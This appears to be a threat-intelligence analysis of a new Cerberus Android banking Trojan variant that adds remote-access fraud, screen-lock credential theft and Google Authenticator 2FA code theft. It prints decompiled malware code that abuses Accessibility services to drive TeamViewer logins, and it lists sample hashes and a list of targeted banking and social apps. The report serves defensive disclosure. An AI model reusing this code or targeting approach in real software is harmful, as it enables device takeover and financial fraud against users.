Cerberus
The Cerberus banking Trojan that appeared on the threat landscape end of June 2019 has taken over from the infamous Anubis Trojan as major rented banking malware. While offering a feature-set that enables successful exfiltration of personally identifiable information (PII) from infected devices, Cerberus was still lacking features that could help lowering the detection barrier during the abuse of stolen information and fraud. Mid-January 2020, after new-year celebrations, Cerberus authors came back with a new variant that aimed to resolve that problem, a RAT feature to perform fraud from the infected device.
This new Cerberus variant has undergone refactoring of the code base and updates of the C2 communication protocol, but most notably it got enhanced with the RAT capability, possibility to steal device screen-lock credentials (PIN code or swipe pattern) and 2FA tokens from the Google Authenticator application.
The RAT service is able to traverse the file system of the device and download its contents. On top of that it can also launch TeamViewer and setup connections to it, providing threat actors full remote access of the device.
Once TeamViewer is working, it provides actors with many possibilities, including changing device settings, installing or removing apps, but most notably using any app on the device (such as banking apps, messengers and social network apps). It can also provide valuable insight into victim’s behavior and habits; in case it would be used for espionage purposes.
The following snippet shows the code responsible for TeamViewer login and initialization:
String runningPackage = this.lowerPkgName;
if(getNodeFromEvent.contains("com.teamviewer.host.market")) {
AccessibilityNodeInfo username = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_username");
AccessibilityNodeInfo password = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_password");
AccessibilityNodeInfo submit = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_submit_button");
if(username != null) {
this.teamviewerUsername = this.utils.readShPrStr(this, this.strings.connect_teamviewer);
if(!this.teamviewerUsername.isEmpty()) {
this.teamviewerPassord = this.utils.readShPrStr(this, this.strings.password);
this.credsSubmitted = false;
this.passwordFilled = false;
this.userFilled = false;
this.permissionStatus = 0;
this.utils.writeShPrStr(this, this.strings.connect_teamviewer, "");
this.utils.writeShPrStr(this, this.strings.password, "");
}
}
if(this.permissionStatus == 0) {
AccessibilityNodeInfo v7_7 = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/action_bar_root");
if(v7_7 != null && AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/buttonPanel") != null) {
this.permissionStatus = 1;
AccessibilityNodeInfo tmButton = AcccesibilityUtils.getNodeFromEvent(event, "android:id/button1");
if(tmButton != null) {
this.acc_utils.clickButton(tmButton);
}
AccessibilityNodeInfo klmCheckBox = AcccesibilityUtils.getNodeFromEvent(event, "com.samsung.klmsagent:id/checkBox1");
AccessibilityNodeInfo klmConfirm = AcccesibilityUtils.getNodeFromEvent(event, "com.samsung.klmsagent:id/btn_confirm");
if(klmCheckBox != null && this.permissionStatus == 1) {
this.acc_utils.clickButton(klmCheckBox);
this.acc_utils.clickButton(klmConfirm);
this.permissionStatus = 2;
Utils utils = this.utils;
utils.launchPkg(this, "com.teamviewer.host.market");
}
}
}
if(!this.teamviewerUsername.isEmpty() && !this.teamviewerPassord.isEmpty()) {
if(username != null && !this.userFilled) {
this.acc_utils.setInput(username, this.teamviewerUsername);
this.userFilled = true;
}
if(password != null && !this.passwordFilled) {
this.acc_utils.setInput(password, this.teamviewerPassord);
this.passwordFilled = true;
}
if((this.userFilled) && (this.passwordFilled) && !this.credsSubmitted) {
this.permissionStatus = 0;
this.acc_utils.clickButton(submit);
this.credsSubmitted = true;
String v0_9 = this.utils.readShPrStr(this, this.strings.hidden);
if(v0_9.equals("true")) {
this.goBack();
}
}
}
}The feature enabling theft of device’s screen lock credentials (PIN and lock pattern) is powered by a simple overlay that will require the victim to unlock the device. From the implementation of the RAT we can conclude that this screen-lock credential theft was built in order for the actors to be able to remotely unlock the device in order to perform fraud when the victim is not using the device. This once more shows the creativity of criminals to build the right tools to be successful.
Abusing the Accessibility privileges, the Trojan can now also steal 2FA codes from Google Authenticator application. When the app is running, the Trojan can get the content of the interface and can send it to the C2 server. Once again, we can deduce that this functionality will be used to bypass authentication services that rely on OTP codes.
This is an example of what the Google Authenticator application looks like:
Until now, the end of February 2020, no advertisement for these features has yet been made in underground forums. Therefore, we believe that this variant of Cerberus is still in the test phase but might be released soon. Having an exhaustive target list including institutions from all over the world, combined with its new RAT capability, Cerberus is a critical risk for financials offering online banking services. Whether in its target list or not, it is easy for its operators to enhance the list to target additional apps (refer to the appendix for the current target list).
Samples
| SHA-256 |
|---|
| c3adb0a1a420af392de96b1150f0a23d8826c8207079e1dc268c07b763fe1af7 |
| 4ff95cadf83b47d1305f1deb4315e6387c4c0d58a0bdd12f74e866938c48baa5 |
| 9d4ce9cce72ec64761014aecbf1076041a8d790771fa8f8899bd3e2b2758281d |
Target list
| Package name | App name |
|---|---|
| au.com.nab.mobile | NAB Mobile Banking |
| com.IngDirectAndroid | ING Direct France |
| com.abnamro.nl.mobile.payments | ABN AMRO Mobiel Bankieren |
| com.akbank.android.apps.akbank_direkt | Akbank Direkt |
| com.android.vending | Google Play Store |
| com.att.myWireless | myAT&T |
| com.bankinter.launcher | Bankinter Móvil |
| com.bbva.bbvacontigo | BBVA Spain |
| com.bmo.mobile | BMO Mobile Banking |
| com.boursorama.android.clients | Boursorama Banque |
| com.caisseepargne.android.mobilebanking | Banque |
| com.chase.sig.android | Chase Mobile |
| com.cibc.android.mobi | CIBC Mobile Banking® |
| com.clairmail.fth | Fifth Third Mobile Banking |
| com.cm_prod.bad | Crédit Mutuel |
| com.coinbase.android | Coinbase - Buy Bitcoin & more. Secure Wallet. |
| com.commbank.netbank | CommBank |
| com.connectivityapps.hotmail | Connect for Hotmail |
| com.csam.icici.bank.imobile | iMobile by ICICI Bank |
| com.db.mm.norisbank | norisbank App |
| com.db.pbc.miabanca | La Mia Banca |
| com.finansbank.mobile.cepsube | QNB Finansbank Cep ªubesi |
| com.finanteq.finance.ca | CA24 Mobile |
| com.garanti.cepsubesi | Garanti Mobile Banking |
| com.google.android.gm | Gmail |
| com.grppl.android.shell.CMBlloydsTSB73 | Lloyds Bank Mobile Banking |
| com.grppl.android.shell.halifax | Halifax: the banking app that gives you extra |
| com.infonow.bofa | Bank of America Mobile Banking |
| com.konylabs.capitalone | Capital One® Mobile |
| com.kutxabank.android | Kutxabank |
| com.kuveytturk.mobil | Mobil ªube |
| com.latuabancaperandroid | Intesa Sanpaolo Mobile |
| com.mail.mobile.android.mail | mail.com mail |
| com.microsoft.office.outlook | Microsoft Outlook |
| com.pozitron.iscep | ݺCep |
| com.rbc.mobile.android | RBC Mobile |
| com.rsi | ruralvía |
| com.sbi.SBIFreedomPlus | SBI Anywhere Personal |
| com.starfinanz.smob.android.sfinanzstatus | Sparkasse Ihre mobile Filiale |
| com.suntrust.mobilebanking | SunTrust Mobile App |
| com.targo_prod.bad | TARGOBANK Mobile Banking |
| com.teb | CEPTETEB |
| com.tmobtech.halkbank | Halkbank Mobil |
| com.unicredit | Mobile Banking UniCredit |
| com.usaa.mobile.android.usaa | USAA Mobile |
| com.usbank.mobilebanking | U.S. Bank |
| com.vakifbank.mobile | VakıfBank Mobil Bankacılık |
| com.wf.wellsfargomobile | Wells Fargo Mobile |
| com.yahoo.mobile.client.android.mail | Yahoo Mail – Stay Organized |
| com.ykb.android | Yapı Kredi Mobile |
| com.ziraat.ziraatmobil | Ziraat Mobil |
| de.comdirect.android | comdirect mobile App |
| de.commerzbanking.mobil | Commerzbank Banking App |
| de.consorsbank | Consorsbank |
| de.dkb.portalapp | DKB-Banking |
| de.fiducia.smartphone.android.banking.vr | VR-Banking |
| de.postbank.finanzassistent | Postbank Finanzassistent |
| es.bancosantander.apps | Santander |
| es.cm.android | Bankia |
| es.evobanco.bancamovil | EVO Banco móvil |
| es.ibercaja.ibercajaapp | Ibercaja |
| es.lacaixa.mobile.android.newwapicon | CaixaBank |
| es.univia.unicajamovil | UnicajaMovil |
| eu.unicreditgroup.hvbapptan | HVB Mobile B@nking |
| finansbank.enpara | Enpara.com Cep ªubesi |
| fr.banquepopulaire.cyberplus | Banque Populaire |
| fr.creditagricole.androidapp | Ma Banque |
| fr.lcl.android.customerarea | Mes Comptes - LCL |
| it.bnl.apps.banking | BNL |
| it.copergmps.rt.pf.android.sp.bmps | Banca MPS |
| it.ingdirect.app | ING DIRECT Italia |
| it.nogood.container | UBI Banca |
| it.popso.SCRIGNOapp | SCRIGNOapp |
| jp.co.rakuten_bank.rakutenbank | 楽天銀行 -個人のお客様向けアプリ |
| mobi.societegenerale.mobile.lappli | L'Appli Société Générale |
| org.stgeorge.bank | St.George Mobile Banking |
| pe.com.interbank.mobilebanking | Interbank APP |
| piuk.blockchain.android | Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum |
| pl.mbank | mBank PL |
| pl.pkobp.iko | IKO |
| posteitaliane.posteapp.apppostepay | Postepay |
| com.facebook.katana | |
| com.instagram.android | |
| com.paypal.android.p2pmobile | PayPal Cash App: Send and Request Money Fast |
| com.snapchat.android | Snapchat |
| com.twitter.android | |
| com.viber.voip | Viber Messenger |
| com.whatsapp | WhatsApp Messenger |
| org.telegram.messenger | Telegram |